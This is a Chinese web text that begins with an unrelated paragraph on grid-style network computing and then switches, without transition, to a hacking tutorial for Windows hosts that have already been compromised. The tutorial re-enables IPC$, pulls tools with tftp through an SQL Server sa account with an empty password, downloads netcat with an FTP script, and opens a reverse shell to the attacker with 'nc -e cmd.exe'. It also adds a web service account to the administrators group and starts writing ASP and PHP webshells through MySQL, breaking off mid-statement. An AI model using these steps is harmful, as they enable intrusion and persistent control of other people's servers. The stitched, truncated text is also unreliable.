网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。
比如用溢出攻击得到权限 发现没有开139 or 445 我们可以从内部make it崩溃:
1.net share ipc$
例如,使用webdav溢出得到system net share 看一下 没有任何东西 用什么东西都连不上 所以 要先打开ipc$——net share ipc$
剩下的你愿意使用什么就可以了,比如dameware.
2.t
ftp.exe
获得sa空口令,使用sqlexec链接,只开了80和1433怎么办?别忘了,你是在内部控制他,
防火墙是可以从内部突破的。
打开本地的tftp server 然后在sqlexec中输入
tftp -i yourip get files
就可以了。
3.ftp
脚本 + nc
比如从80端口溢出后可以,写一个ftp的脚本然后用ftp -s ftp.txt从你的ftp下载nc。在溢出的命令提示符下使用nc
nc -e c:\winnt\system32\cmd.exe yourip 888
在本地命令提示符下
nc -l -p 888 -vv
4.iusr_xx 高权限的cmd.asp
有运气的成分,80端口溢出,net localgroup administrators iusr_computername /add
用echo 写一个cmd.asp……
5.使用mysql写的cmd.php
我转再过一篇文章 再贴一次
通过mysql入侵
1、在默认的mysql数据库中生成一个叫tmp的表,只有一个字段名,叫cmd,数据类型为text(可以不分大
小写)
use mysql
create table tmp(cmd text)
2、在tmp表cmd字段中写入一段php代码(注意这个文件导出后一定要叫cmd2.php)
insert into tmp values(<
关键词:没开IPC$主机上传下载思路